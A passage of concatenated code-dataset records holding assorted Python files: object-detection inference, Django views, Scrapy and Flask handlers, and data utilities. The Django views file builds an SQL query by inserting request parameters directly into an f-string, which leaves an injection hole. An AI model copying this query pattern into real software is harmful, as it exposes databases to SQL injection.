mediaUrls(info)\r\nfileNames = web2text(urls)\r\nprint(fileNames)\r\n\r\n# TODO\r\n'''\r\nnew funtion\r\ndownloads media from the urls\r\nwhich are\r\nprovided by the mediaUrls function\r\n'''\r\n\r\n# Example: download video\r\n'''\r\ndwn_link = 'https://download-a.akamaihd.net/files/media_periodical/8f/mwbv_E_201901_01_r720P.mp4'\r\nfile_name = 'primera conversación.mp4' \r\nrsp = requests.get(dwn_link)\r\nrsp.raise_for_status()\r\nfile = open(file_name, 'wb')\r\nfor chunk in rsp.iter_content(100000):\r\n file.write(chunk)\r\nfile.close()\r\n\r\n# Video element\r\n# \r\n# \r\n'''\r\n\r\n\r\n\r\n","sub_path":"dmm.py","file_name":"dmm.py","file_ext":"py","file_size_in_byte":3871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"87313392","text":"import os\nfrom argparse import ArgumentParser\nfrom utils import DefaultBoxes, Encoder, COCODetection\nfrom base_model import Loss\nfrom utils import SSDTransformer\nfrom ssd_r34 import SSD_R34\nimport torch\nfrom torch.autograd import Variable\nfrom torch.utils.data import DataLoader\nimport time\nimport numpy as np\n\n\ndef parse_args():\n parser = ArgumentParser(description=\"Train Single Shot MultiBox Detector\"\n \" on COCO\")\n parser.add_argument('--data', '-d', type=str, default='../coco',\n help='path to test and training data files')\n parser.add_argument('--batch-size', '-b', type=int, default=4,\n help='number of examples for each iteration')\n parser.add_argument('--no-cuda', action='store_true',\n help='use available GPUs')\n parser.add_argument('--seed', '-s', type=int,\n help='manually set random seed for torch')\n parser.add_argument('--device', '-did', type=int,\n help='device id') \n parser.add_argument('--threshold', '-t', type=float, default=0.212,\n help='stop training early at threshold')\n parser.add_argument('--checkpoint', type=str, default='./pretrained/resnet34-ssd1200.pth',\n help='path to model checkpoint file')\n parser.add_argument('--image-size', default=[1200,1200], type=int, nargs='+',\n help='input image sizes (e.g 1400 1400,1200 1200') \n parser.add_argument('--strides', default=[3,3,2,2,2,2], type=int, nargs='+',\n help='stides for ssd model must include 6 numbers') \n parser.add_argument('--use-fp16', action='store_true') \n parser.add_argument('--onnx', '-o', type=str, default=None,\n help='mode for onnx \\{export, eval\\}.')\n return parser.parse_args()\n\n\ndef show_memusage(device=0):\n import gpustat\n gpu_stats = gpustat.GPUStatCollection.new_query()\n item = gpu_stats.jsonify()[\"gpus\"][device]\n print(\"{}/{}\".format(item[\"memory.used\"], item[\"memory.total\"]))\n\n\ndef dboxes_R34_coco(figsize,strides):\n ssd_r34=SSD_R34(81,strides=strides)\n synt_img=torch.rand([1,3]+figsize)\n #if use_cude:\n # synt_img.to('cuda')\n # ssd_r34.to('cuda')\n _,_,feat_size =ssd_r34(synt_img, extract_shapes = True)\n print('Features size: ', feat_size)\n # import pdb; pdb.set_trace()\n steps=[(int(figsize[0]/fs[0]),int(figsize[1]/fs[1])) for fs in feat_size]\n # use the scales here: https://github.com/amdegroot/ssd.pytorch/blob/master/data/config.py\n scales = [(int(s*figsize[0]/300),int(s*figsize[1]/300)) for s in [21, 45, 99, 153, 207, 261, 315]] \n aspect_ratios = [[2], [2, 3], [2, 3], [2, 3], [2], [2]] \n dboxes = DefaultBoxes(figsize, feat_size, steps, scales, aspect_ratios)\n print('dboxes from dboxes_R34_coco', dboxes)\n return dboxes\n\ndef coco_eval_export(model, coco, cocoGt, encoder, inv_map, threshold,device=0,use_cuda=False):\n from pycocotools.cocoeval import COCOeval\n model.eval()\n if use_cuda:\n print('use cuda')\n model = model.to('cuda')\n start = time.time()\n for idx, image_id in enumerate(coco.img_keys):\n img, (htot, wtot), _, _ = coco[idx]\n\n with torch.no_grad():\n print(\"Parsing image: {}/{}\".format(idx+1, len(coco)), end=\"\\r\")\n inp = img.unsqueeze(0)\n if use_cuda:\n inp = inp.to('cuda')\n\n class SSDModel(torch.nn.Module):\n def __init__(self, backbone, encoder):\n super(SSDModel, self).__init__()\n self.backbone = backbone\n self.encoder = encoder\n\n def forward(self, inp):\n ploc, plabel, _ = self.backbone(inp)\n return self.encoder.decode_batch_with_multi_label_nms_trace(ploc, plabel, 0.50, 200, device=device)\n \n start_time=time.time()\n ploc, plabel, out2 = model(inp)\n time.time()-start_time\n print('Mode inference time: ', time.time()-start_time)\n\n try:\n result = encoder.decode_batch_with_multi_label_nms_trace(ploc, plabel, 0.50, 200,device=device)\n print('result:', result)\n except Exception as e:\n #raise\n print(e)\n print(\"No object detected in idx: {}\".format(idx))\n continue\n print('Decoding time: ', time.time()-start_time)\n\n # export to onnx\n import pytorch_tmp_patch\n def register_custom_op():\n # experimenting custom op registration.\n from torch.onnx.symbolic import parse_args, _cast_Int, _cast_Long\n def symbolic_multi_label_nms(g, boxes, scores, max_output_per_class, iou_threshold, score_threshold):\n return g.op('NonMaxSuppression', boxes, scores, max_output_per_class, iou_threshold, score_threshold)\n\n from torch.onnx import register_custom_op_symbolic\n register_custom_op_symbolic('roi_ops::multi_label_nms', symbolic_multi_label_nms)\n register_custom_op()\n\n print('Save model to onnx')\n import onnx_helper\n model_name = 'ssd_model'\n model_dir = 'test_' + model_name\n onnx_helper.Save('.', model_name, SSDModel(model, encoder), [inp], result, ['image'], ['bboxes', 'labels', 'scores'], do_constant_folding=True)\n\n # load back to ort\n import onnxruntime\n import onnx\n\n onnx_model_path = 'test_ssd_model/model.onnx'\n\n model = onnx.load(onnx_model_path)\n model = onnx_helper.update_with_default_names(model, ['bboxes', 'labels', 'scores'])\n model = onnx_helper.update_inputs_outputs_dims(model,\n [[1, 3, 1200, 1200]],\n [[1, 'nbox', 4], [1, 'nbox'], [1, 'nbox']])\n onnx.save(model, onnx_model_path)\n\n sess = onnxruntime.InferenceSession(onnx_model_path)\n\n out_onnx = sess.run(None, { sess.get_inputs()[0].name: inp.data.cpu().numpy() })\n print('out onnx:', out_onnx)\n break\n\n print(\"\")\n print(\"Export Ended, total time: {:.2f} s\".format(time.time()-start))\n\n\ndef coco_eval_onnx(model, coco, cocoGt, encoder, inv_map, threshold,device=0,use_cuda=False):\n from pycocotools.cocoeval import COCOeval\n model.eval()\n if use_cuda:\n print('use cuda')\n model = model.to('cuda')\n ret = []\n\n import onnxruntime\n onnx_model_path = 'test_ssd_model/model.onnx'\n sess = onnxruntime.InferenceSession(onnx_model_path)\n\n start = time.time()\n for idx, image_id in enumerate(coco.img_keys):\n img, (htot, wtot), _, _ = coco[idx]\n\n with torch.no_grad():\n print(\"Parsing image: {}/{}\".format(idx+1, len(coco)), end=\"\\r\")\n inp = img.unsqueeze(0)\n start_time=time.time()\n out_onnx = sess.run(None, {\n sess.get_inputs()[0].name: inp.data.cpu().numpy()\n })\n time.time()-start_time\n print('Detection time: ', time.time()-start_time)\n loc, label, prob = out_onnx\n\n print('Detections: ', label[0].shape)\n for loc_, label_, prob_ in zip(loc[0], label[0], prob[0]):\n ret.append([image_id, loc_[0]*wtot, \\\n loc_[1]*htot,\n (loc_[2] - loc_[0])*wtot,\n (loc_[3] - loc_[1])*htot,\n prob_,\n inv_map[label_]])\n\n print(\"\")\n print(\"Predicting Ended, total time: {:.2f} s\".format(time.time()-start))\n cocoDt = cocoGt.loadRes(np.array(ret))\n\n E = COCOeval(cocoGt, cocoDt, iouType='bbox')\n E.evaluate()\n E.accumulate()\n E.summarize()\n print(\"Current AP: {:.5f} AP goal: {:.5f}\".format(E.stats[0], threshold))\n\n return (E.stats[0] >= threshold) #Average Precision (AP) @[ IoU=050:0.95 | area= all | maxDets=100 ]\n\n\ndef coco_eval(model, coco, cocoGt, encoder, inv_map, threshold,device=0,use_cuda=False):\n from pycocotools.cocoeval import COCOeval\n model.eval()\n if use_cuda:\n print('use cuda')\n model = model.to('cuda')\n ret = []\n start = time.time()\n for idx, image_id in enumerate(coco.img_keys):\n img, (htot, wtot), _, _ = coco[idx]\n\n with torch.no_grad():\n print(\"Parsing image: {}/{}\".format(idx+1, len(coco)), end=\"\\r\")\n inp = img.unsqueeze(0)\n if use_cuda:\n inp = inp.to('cuda')\n start_time=time.time()\n ploc, plabel,_ = model(inp)\n time.time()-start_time\n print('Mode inference time: ', time.time()-start_time)\n try:\n result = encoder.decode_batch(ploc, plabel, 0.50, 200,device=device)[0]\n except:\n #raise\n print(\"No object detected in idx: {}\".format(idx))\n continue\n print('Decoding time: ', time.time()-start_time)\n loc, label, prob = [r.cpu().numpy() for r in result]\n \n for loc_, label_, prob_ in zip(loc, label, prob):\n ret.append([image_id, loc_[0]*wtot, \\\n loc_[1]*htot,\n (loc_[2] - loc_[0])*wtot,\n (loc_[3] - loc_[1])*htot,\n prob_,\n inv_map[label_]])\n print(\"\")\n print(\"Predicting Ended, total time: {:.2f} s\".format(time.time()-start))\n cocoDt = cocoGt.loadRes(np.array(ret))\n\n E = COCOeval(cocoGt, cocoDt, iouType='bbox')\n E.evaluate()\n E.accumulate()\n E.summarize()\n print(\"Current AP: {:.5f} AP goal: {:.5f}\".format(E.stats[0], threshold))\n\n return (E.stats[0] >= threshold) #Average Precision (AP) @[ IoU=050:0.95 | area= all | maxDets=100 ]\n\n\ndef eval_ssd_r34_mlperf_coco(args):\n from coco import COCO\n # Check that GPUs are actually available\n use_cuda = not args.no_cuda and torch.cuda.is_available()\n dboxes = dboxes_R34_coco(args.image_size,args.strides)\n encoder = Encoder(dboxes)\n val_trans = SSDTransformer(dboxes, (args.image_size[0], args.image_size[1]), val=True)\n\n val_annotate = os.path.join(args.data, \"annotations/instances_val2017.json\")\n val_coco_root = os.path.join(args.data, \"val2017\")\n\n cocoGt = COCO(annotation_file=val_annotate)\n val_coco = COCODetection(val_coco_root, val_annotate, val_trans)\n inv_map = {v:k for k,v in val_coco.label_map.items()}\n\n print('ssd r34')\n ssd_r34 = SSD_R34(val_coco.labelnum, strides=args.strides)\n\n print(\"loading model checkpoint\", args.checkpoint)\n od = torch.load(args.checkpoint, map_location=lambda storage, loc: storage)\n # import pdb; pdb.set_trace()\n ssd_r34.load_state_dict(od[\"model\"])\n\n if use_cuda:\n ssd_r34.cuda(args.device)\n loss_func = Loss(dboxes)\n if use_cuda:\n loss_func.cuda(args.device)\n\n if args.onnx:\n if args.onnx == 'export':\n return coco_eval_export(ssd_r34, val_coco, cocoGt, encoder, inv_map, args.threshold,args.device,use_cuda)\n elif args.onnx == 'eval':\n return coco_eval_onnx(ssd_r34, val_coco, cocoGt, encoder, inv_map, args.threshold,args.device,use_cuda)\n return coco_eval(ssd_r34, val_coco, cocoGt, encoder, inv_map, args.threshold,args.device,use_cuda)\n\n\ndef main():\n args = parse_args()\n\n if not os.path.isdir('./models'):\n os.mkdir('./models')\n\n if args.seed is not None:\n print(\"Using seed = {}\".format(args.seed))\n torch.manual_seed(args.seed)\n np.random.seed(seed=args.seed)\n # torch.cuda.set_device(args.device)\n # torch.backends.cudnn.benchmark = True\n eval_ssd_r34_mlperf_coco(args)\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"cloud/single_stage_detector/pytorch/infer.py","file_name":"infer.py","file_ext":"py","file_size_in_byte":12128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"248553588","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nimport sqlite3\nimport string\nimport random\n\n# Create your views here.\n\n\ndef hello(request):\n return HttpResponse('hello')\n\n\ndef gen_password(request):\n try:\n if int(request.GET.get('param1')) <= 0:\n return HttpResponse('param1 must be >0')\n else:\n if int(request.GET.get('param1')) <8 or int(request.GET.get('param1')) > 24:\n return HttpResponse('param1 must be between 8 and 24')\n else:\n if request.GET.get('param2') == 'yes':\n return HttpResponse(''.join([\n random.choice(string.ascii_lowercase + string.digits)\n for _ in range(int(request.GET.get('param1')))\n ]))\n elif request.GET.get('param2') == 'no':\n return HttpResponse(''.join([\n random.choice(string.ascii_lowercase)\n for _ in range(int(request.GET.get('param1')))\n ]))\n except ValueError:\n return HttpResponse('Param1 must be a number')\n\n\ndef get_customers(request):\n print(request.GET)\n query = f'select * from customers where State = \"{request.GET.get(\"state\")}\" and City = \"{request.GET.get(\"city\")}\"'\n records = execute_query(query)\n return HttpResponse(records)\n\n\ndef execute_query(query):\n db_path = '/home/dmitry/Downloads/Telegram Desktop/chinook.db'\n conn = sqlite3.connect(db_path)\n cur = conn.cursor()\n cur.execute(query)\n records = cur.fetchall()\n return records\n\n\ndef get_unique_name(request):\n query = 'select distinct FirstName from customers'\n records = execute_query(query)\n num = 0\n for _ in records:\n num += 1\n return HttpResponse(f'{num}')\n\n\ndef get_value(request):\n q = 'select UnitPrice * Quantity from invoice_items'\n rec = execute_query(q)\n return HttpResponse(f'{rec}')\n\n","sub_path":"test_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"460288044","text":"from django.conf.urls import include, url, patterns\nfrom django.conf.urls import url\nfrom .import views\n\nurlpatterns = [\n url(r'^post_list/$', views.post_list, name='post_list'),\n url(r'^post/(?P\\d+)/$', views.post_detail, name='post_detail'),\n url(r'^post/new/$', views.post_new, name='post_new'),\n url(r'^post/(?P\\d+)/edit/$', views.post_edit, name='post_edit'),\n url(r'^login/$', views.login_user, name='login_user'),\n]","sub_path":"blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"481813653","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html\n\n\nclass CatMoviePipeline:\n file = None\n index = 0\n\n def open_spider(self, spider):\n self.file = open('movie.csv', 'a', encoding='utf-8')\n return self.file\n\n def process_item(self, item, spider):\n if self.index == 0:\n column_name = \"电影名称,上映时间,类型\\n\"\n self.file.write(column_name)\n self.index = 1\n home_str = item['name'] + ',' + item['rel'] + ',' + item['type'] + '\\n'\n self.file.write(home_str)\n\n return item\n\n def close_spider(self, spider):\n self.file.close()\n","sub_path":"week01/cat_movie_scrapy/cat_movie/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"269518039","text":"#!flask/bin/python\nfrom flask import Flask, request, render_template\nimport requests\n\napp = Flask(__name__)\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n access_token = '[YOUR_FACEBOOK_ACCESS_TOKEN]'\n verify_token = '[VERIFY_TOKEN]'\n\n if request.method == 'GET':\n hub_challenge = request.args.get('hub.challenge')\n hub_verify_token = request.args.get('hub.verify_token')\n\n if hub_verify_token == verify_token:\n return hub_challenge\n else:\n return render_template('index.html')\n\n elif request.method == 'POST':\n sender_id = None\n input_text = None\n request_json = request.json\n\n try:\n if 'sender' in request_json['entry'][0]['messaging'][0]:\n sender_id = request_json['entry'][0]['messaging'][0]['sender']['id']\n except KeyError as e:\n print('KeyError: {}'.format(e))\n\n try:\n if 'message' in request_json['entry'][0]['messaging'][0]:\n input_text = request_json['entry'][0]['messaging'][0]['message']['text']\n except KeyError as e:\n print('KeyError: {}'.format(e))\n\n if sender_id and input_text:\n # Your logic here...\n\n # Preparing the response\n url = 'https://graph.facebook.com/v2.6/me/messages?access_token=' + access_token\n json_data = {\n \"recipient\": {\n \"id\": sender_id\n },\n \"message\": {\n \"text\": \"Response text\"\n }\n }\n headers = {'Content-Type': 'application/json'}\n requests.post(url, json=json_data, headers=headers)\n return \"Message sent\"\n\n return \"Invalid request\"\n\nif __name__ == '__main__':\n app.run()\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"362783607","text":"import pickle\n\nimport numpy as np\n\nfrom .cls_config import cls_config\n\n\ndef load_model(file_path):\n with open(file_path, 'rb') as f:\n current_model = pickle.load(f)\n\n return current_model\n\n\ndef update_result(result, min_box_thresh, max_box_thresh):\n new_result = {}\n for k in result:\n label_boxes = np.array(result[k])\n\n if label_boxes.shape[0] > 0:\n label_boxes = label_boxes[\n np.logical_and(label_boxes[:, -1] > min_box_thresh, label_boxes[:, -1] <= max_box_thresh)]\n new_result[k] = label_boxes\n else:\n new_result[k] = result[k]\n return new_result\n\n\ndef get_test_data(result, box_thresh_list, feature_order):\n if box_thresh_list[0] != 0:\n box_thresh_list.insert(0, 0)\n if box_thresh_list[-1] != 1:\n box_thresh_list.append(1)\n\n tmp_feats = []\n for thresh_index in range(len(box_thresh_list) - 1):\n current_result = update_result(result, box_thresh_list[thresh_index], box_thresh_list[thresh_index + 1])\n\n for s_feature in feature_order:\n tmp_feats.append(len(current_result[s_feature]))\n\n return np.array([tmp_feats], dtype=np.float32)\n\n\ndef predict_result(clf, test_data):\n if isinstance(clf, list):\n result = []\n for m in clf:\n tmp_result = m.predict(test_data)\n result.append(tmp_result)\n\n tmp_result = np.array(result)\n tmp_result = np.swapaxes(tmp_result, 0, 1)\n result = []\n for s_r in tmp_result:\n unique, counts = np.unique(s_r, return_counts=True)\n result.append(unique[np.argmax(counts)])\n result = int(result[0])\n\n else:\n result = int(clf.predict(test_data)[0])\n\n return result\n\n\nclass img_cls_clf:\n def __init__(self):\n self.check_clf, self.check_feature_order, self.check_thresh_list, _, _ = load_model(cls_config.check_model_path)\n self.cls_clf, self.cls_feature_order, self.cls_thresh_list, self.cls_order, _ = load_model(\n cls_config.cls_model_path)\n\n def infer(self, result):\n test_data = get_test_data(result, self.check_thresh_list, self.check_feature_order)\n\n pos_check = predict_result(self.check_clf, test_data)\n if pos_check == 0:\n return 'normal'\n\n test_data = get_test_data(result, self.cls_thresh_list, self.cls_feature_order)\n cls_label_index = predict_result(self.cls_clf, test_data)\n return self.cls_order[cls_label_index]\n","sub_path":"infer_core/infer_image_cls/img_cls_clf.py","file_name":"img_cls_clf.py","file_ext":"py","file_size_in_byte":2493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"332306162","text":"#http://judge.u-aizu.ac.jp/onlinejudge/description.jsp?id=ITP2_1_D&lang=jp\n# Vector II\n \nfrom collections import deque\nimport sys\ninput = sys.stdin.readline\n \ndef loop_proc():\n (n1,n2) = map(int,input().split())\n wl =[]\n for i in range(n1):\n wl.append(deque())\n for i in range(n2):\n l = list(map(int,input().split())) \n if (l[0] == 0 ):\n wl[l[1]].append(l[2])\n elif (l[0] == 1 ):\n if ( len(wl[l[1]]) == 0 ):\n print (\"\")\n else:\n print (\" \".join(map(str,wl[l[1]])))\n elif (l[0] == 2 ):\n wl[l[1]] = deque()\n \n \nloop_proc()","sub_path":"ITP2/ITP2_1_D.py","file_name":"ITP2_1_D.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"239533851","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path(\"\", views.home, name=\"home_page\"),\n path(\"greeting\", views.greeting, name='greeting'),\n path(\"intro\", views.intro, name='introduction'),\n path(\"date\", views.date, name='datetime'),\n path(\"task\", views.task, name=\"dictioanry_task\")\n\n]","sub_path":"first_project/first_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"33598129","text":"from os import listdir\r\nfrom os.path import isfile, join\r\nfrom bs4 import BeautifulSoup\r\nfrom word import wordSave\r\nimport mistune\r\nimport io\r\nimport os\r\nimport sys\r\nimport json\r\nimport re\r\n\r\n\r\n# {line:\"dsfdsfsfdsfsdffsd\",bold:True,italic:False,underline:False}\r\n\r\nclass WikiParser:\r\n def __init__(self):\r\n self.js = json.load(open('settings.json'))\r\n self.word = wordSave()\r\n self.downloadWikiPage()\r\n self.word.saveFile()\r\n\r\n def parseLine(self, htmlLine):\r\n # print(htmlLine)\r\n bs = BeautifulSoup(htmlLine, \"lxml\")\r\n\r\n # print(bs.prettify())\r\n body = bs.find('body').findChildren(recursive=False)\r\n # print(body)\r\n\r\n for element in body:\r\n bold = False\r\n italic = False\r\n underline = False\r\n arr = [{\"type\": \"text\", \"line\": \"\", \"bold\": False, \"italic\": False, \"underline\": False}]\r\n # print(element)\r\n for tag in element.contents:\r\n if tag != \"\\n\" and tag != \"\":\r\n self.getInner(arr, element)\r\n\r\n if element.name[0:1] == \"h\" and element.name[0:2] != \"hr\":\r\n self.word.addHeading(arr, int(element.name[1:2]))\r\n if element.name == \"p\":\r\n self.word.addPicture(arr)\r\n if element.name == \"li\" or element.name == \"ul\":\r\n self.word.addList(arr)\r\n if element.name == \"blockquote\":\r\n self.word.addParagraph(arr)\r\n if element.name != 'p' and element.name[0:1] != \"h\":\r\n print(arr)\r\n print(element)\r\n print(element.name)\r\n\r\n def getInner(self, arr, htmlTag):\r\n tag = htmlTag.name\r\n print(htmlTag)\r\n\r\n if tag is None:\r\n # arr.append(arr[-1])\r\n arr[-1][\"line\"] = htmlTag\r\n else:\r\n if tag == \"img\":\r\n arr[-1][\"type\"] = \"img\"\r\n arr[-1][\"src\"] = htmlTag['src']\r\n arr[-1][\"line\"] = htmlTag['alt']\r\n if tag == \"a\":\r\n arr[-1][\"src\"] = htmlTag['href']\r\n arr[-1][\"type\"] = \"link\"\r\n for tt in htmlTag.contents:\r\n if tt != \"\\n\" and tt != \"\":\r\n self.getInner(arr, tt)\r\n pass\r\n\r\n def getFiles(self, name):\r\n print(name)\r\n self.workDir = os.path.abspath(os.path.dirname(sys.argv[0])) + \"\\\\\" + name + \"\\\\\"\r\n onlyfiles = [f for f in listdir(self.workDir) if isfile(join(self.workDir, f))]\r\n print(onlyfiles)\r\n for file in onlyfiles:\r\n try:\r\n self.parseMd(self.workDir + file)\r\n except Exception:\r\n print(\"encoding file Exception\")\r\n continue\r\n\r\n def parseMd(self, file):\r\n with io.open(file, 'r', encoding='utf8') as fileHelp:\r\n f = fileHelp.readlines()\r\n htmlPage = \"\"\r\n for line in f:\r\n htmlPage += mistune.markdown(line)\r\n print(line)\r\n self.parseLine(htmlPage)\r\n\r\n @staticmethod\r\n def getAllInnerFiles(path):\r\n arr = []\r\n for file in listdir(path):\r\n print(isfile(file))\r\n if os.path.isfile(join(path, file)):\r\n arr.append(join(path, file))\r\n else:\r\n if os.path.isdir(join(path, file)):\r\n arr += WikiParser.getAllInnerFiles(join(path, file))\r\n return arr\r\n\r\n def printCode(self, filePath):\r\n with io.open(filePath, 'r', encoding='utf8') as fileHelp:\r\n f = fileHelp.readlines()\r\n self.word.addPageBreak()\r\n self.word.addHeadCode(filePath[len(os.path.dirname(sys.argv[0])) + 1:])\r\n self.word.addCode(f)\r\n\r\n def addCodeFiles(self, name):\r\n path = os.path.abspath(os.path.dirname(sys.argv[0])) + \"\\\\\" + name + \"\\\\\"\r\n onlyfiles = WikiParser.getAllInnerFiles(path)\r\n print(onlyfiles)\r\n ignoreStr = []\r\n chooseStr = []\r\n for str in self.js['ignoreFiles']:\r\n ignoreStr.append(str['regExp'])\r\n for str in self.js['chooseFiles']:\r\n chooseStr.append(str['regExp'])\r\n print(ignoreStr)\r\n print(chooseStr)\r\n regExpIgnore = re.compile(\"|\".join(ignoreStr))\r\n regExpChoose = re.compile(\"|\".join(chooseStr))\r\n answer = []\r\n for p in onlyfiles:\r\n hlp = regExpIgnore.search(p)\r\n if hlp is not None and len(hlp.group(0)) > 0:\r\n print(\"ignore\" + p)\r\n continue\r\n hlp = regExpChoose.search(p)\r\n if hlp is not None and len(hlp.group(0)) > 0:\r\n print(\"add\" + p)\r\n answer.append(p)\r\n for file in answer:\r\n self.printCode(file)\r\n\r\n # def parseIssue(self):\r\n\r\n def downloadWikiPage(self):\r\n # self.titleDeed()\r\n # return\r\n # link = str(input())\r\n link = \"https://github.com/facebook/react\"\r\n os.system(\"git clone \" + link + \".git\")\r\n os.system(\"git clone \" + link + \".wiki.git\")\r\n self.getFiles(link[link.rfind(\"/\") + 1::].replace(' ', '') + \".wiki\")\r\n self.addCodeFiles(link[link.rfind(\"/\") + 1::].replace(' ', ''))\r\n # print(page)\r\n\r\n\r\nprint(\"---------------------------------------\")\r\nprint(\"------------- START -------------\")\r\n\r\nWikiParser()\r\n","sub_path":"wiki.py","file_name":"wiki.py","file_ext":"py","file_size_in_byte":5363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"471000321","text":"from selenium import webdriver \n# from shutil import which \nfrom selenium.webdriver.common.by import By \nfrom selenium.webdriver.support.ui import WebDriverWait \nfrom selenium.webdriver.support import expected_conditions \n \n@given(u'user is on the landing page') \ndef step_impl(context): \n context.browser.get(\"http://localhost:8081/\") \n \n \n@when(u'user clicks on launch button') \ndef step_impl(context): \n button = By.XPATH, '//button' \n WebDriverWait(context.browser,100).until( \n expected_conditions.presence_of_element_located(button) \n ) \n context.browser.find_element(*button).click() \n \n@then(u'user gets redirected to the dashboard') \ndef step_impl(context): \n wait = WebDriverWait(context.browser, 3) \n assert context.browser.current_url == \"http://localhost:8081/login\" \n","sub_path":"features/steps/sign_in_step.py","file_name":"sign_in_step.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"210188335","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Mar 13 21:32:08 2018\n\n@author: zkapach\n\"\"\"\n\nimport _init_paths\nfrom core.train import get_training_roidb\nfrom core.config import cfg, cfg_from_file, cfg_from_list, get_output_dir, loadDatasetIndexDict,iconicImagesFileFormat\nfrom datasets.factory import get_repo_imdb\nfrom datasets.ds_utils import load_mixture_set,print_each_size,computeTotalAnnosFromAnnoCount,cropImageToAnnoRegion,roidbSampleHOG,roidbSampleImage\nimport os.path as osp\nimport datasets.imdb\nimport argparse\nimport pprint\nimport numpy as np\nimport sys,os,cv2,pickle\n# pytorch imports\nfrom datasets.pytorch_roidb_loader import RoidbDataset\nfrom numpy import transpose as npt\nfrom ntd.hog_svm import plot_confusion_matrix, extract_pyroidb_features,appendHOGtoRoidb,split_data, scale_data,train_SVM,findMaxRegions\n\ndef parse_args():\n \"\"\"\n Parse input arguments\n \"\"\"\n parser = argparse.ArgumentParser(description='Test loading a mixture dataset')\n parser.add_argument('--cfg', dest='cfg_file',\n help='optional config file',\n default=None, type=str)\n parser.add_argument('--setID', dest='setID',\n help='which 8 digit ID to read from',\n default='11111111', type=str)\n parser.add_argument('--repeat', dest='repeat',\n help='which repeat to read from',\n default='1', type=str)\n parser.add_argument('--size', dest='size',\n help='which size to read from',\n default=250, type=int)\n parser.add_argument('--save', dest='save',\n help='save some samples with bboxes visualized?',\n action='store_true')\n parser.add_argument('--rand', dest='randomize',\n help='randomize (do not use a fixed seed)',\n action='store_true')\n parser.add_argument('--model', dest='model',\n help='give the path to a fit model',\n default=None, type=str)\n\n if len(sys.argv) == 1:\n parser.print_help()\n sys.exit(1)\n\n args = parser.parse_args()\n return args\n\ndef get_bbox_info(roidb,size):\n areas = np.zeros((size))\n widths = np.zeros((size))\n heights = np.zeros((size))\n actualSize = 0\n idx = 0\n for image in roidb:\n if image['flipped'] is True: continue\n bbox = image['boxes']\n for box in bbox:\n actualSize += 1\n widths[idx] = box[2] - box[0]\n heights[idx] = box[3] - box[1]\n assert widths[idx] >= 0,\"widths[{}] = {}\".format(idx,widths[idx])\n assert heights[idx] >= 0\n areas[idx] = widths[idx] * heights[idx]\n idx += 1\n return areas,widths,heights\n\n\nif __name__ == '__main__':\n args = parse_args()\n\n print('Called with args:')\n print(args)\n\n if args.cfg_file is not None:\n cfg_from_file(args.cfg_file)\n\n print('Using config:')\n pprint.pprint(cfg)\n\n if not args.randomize:\n np.random.seed(cfg.RNG_SEED)\n\n setID = args.setID\n repeat = args.repeat\n size = args.size\n \n roidb,annoCount = load_mixture_set(setID,repeat,size)\n numAnnos = computeTotalAnnosFromAnnoCount(annoCount)\n\n print(\"\\n\\n-=-=-=-=-=-=-=-=-\\n\\n\")\n print(\"Report:\\n\\n\")\n print(\"Mixture Dataset: {} {} {}\\n\\n\".format(setID,repeat,size))\n\n print(\"number of images: {}\".format(len(roidb)))\n print(\"number of annotations: {}\".format(numAnnos))\n print(\"size of roidb in memory: {}kB\".format(len(roidb) * sys.getsizeof(roidb[0])/1024.))\n print(\"example roidb:\")\n for k,v in roidb[0].items():\n print(\"\\t==> {},{}\".format(k,type(v)))\n print(\"\\t\\t{}\".format(v))\n\n print(\"computing bbox info...\")\n areas, widths, heights = get_bbox_info(roidb,numAnnos)\n\n print(\"ave area: {} | std. area: {}\".format(np.mean(areas),np.std(areas,dtype=np.float64)))\n print(\"ave width: {} | std. width: {}\".format(np.mean(widths),np.std(widths,dtype=np.float64)))\n print(\"ave height: {} | std. height: {}\".format(np.mean(heights),np.std(heights,dtype=np.float64)))\n prefix_path = cfg.IMDB_REPORT_OUTPUT_PATH\n if osp.exists(prefix_path) is False:\n os.makedirs(prefix_path)\n\n path = osp.join(prefix_path,\"areas.dat\")\n np.savetxt(path,areas,fmt='%.18e',delimiter=' ')\n path = osp.join(prefix_path,\"widths.dat\")\n np.savetxt(path,widths,fmt='%.18e',delimiter=' ')\n path = osp.join(prefix_path,\"heights.dat\")\n np.savetxt(path,heights,fmt='%.18e',delimiter=' ')\n\n \n print(\"-=\"*50)\n\n clsToSet = loadDatasetIndexDict()\n\n print(\"as pytorch friendly \")\n\n pyroidb = RoidbDataset(roidb,[0,1,2,3,4,5,6,7],\n 